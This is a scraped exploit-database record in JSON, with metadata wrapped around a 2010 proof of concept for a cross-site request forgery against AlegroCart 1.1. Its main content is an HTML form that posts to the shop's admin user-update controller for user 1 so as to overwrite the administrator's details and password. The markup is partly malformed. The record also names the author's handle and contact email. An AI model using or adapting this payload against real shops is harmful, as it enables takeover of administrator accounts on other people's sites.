Description
Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)
{"lastseen": "2020-04-01T19:04:19", "references": [], "description": "\nHome Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)", "edition": 1, "reporter": "The.Morpheus", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-02-01T00:00:00", "title": "Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-02-01T00:00:00", "id": "EXPLOITPACK:CCF286E52E81CD6CC0F1C929B741F2E2", "href": "", "viewCount": 3, "sourceData": "[#]----------------------------------------------------------------[#]\n#\n# [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password\n#\n# // Author Info\n# [x] Author: The.Morpheus\n# [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com>\n# [x] Thanks: T\u00fcrksec.İnfo ~ Nd And Tg Tayfa :P\n# [x] Date : 01.02.2010\n#\n[#]-------------------------------------------------------------------------------------------[#]\n\n# Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4\n\n# [x] Exploit :\n#\n# [ XSRF ]\n#\n# [ Login ]\n# http://[server]/[path]/admin/\n#\n# // Start XSRF\n|-------------------------------------------------------------------------------|\n\n<form action=\"http://server/admin/?controller=user&user_id=1&action=update;action=update\" method=\"post\" enctype=\"multipart/form-data\" id=\"form\">\nwidth=\"185\"><span class=\"required\">*</span> Username:</td>\n<input type=\"text\" name=\"username\" value=\"admin\">\n<span class=\"required\">*</span> First Name:</td>\n<input type=\"text\" name=\"firstname\" value=\"admin\">\n<span class=\"required\">*</span> Last Name:</td>\n<input type=\"text\" name=\"lastname\" value=\"admin\">\n<td>E-Mail:</td>\n<input type=\"text\" name=\"email\" value=\"admin\"></td>\n<td>User Group:</td>\n<td><select name=\"user_group_id\">\n<option value=\"1\" selected>Top Administrator</option>\n</select></td>\n<td>Password:</td>\n<input type=\"password\" name=\"password\" value=\"\" >\n<td>Confirm:</td>\n<input type=\"password\" name=\"confirm\" value=\"\">\n</form>\n\n\n|-------------------------------------------------------------------------------|\n# // End of attack ~\n#\n[#]------------------------------------------------------------------------------------------[#]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645475286}}
{}
Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)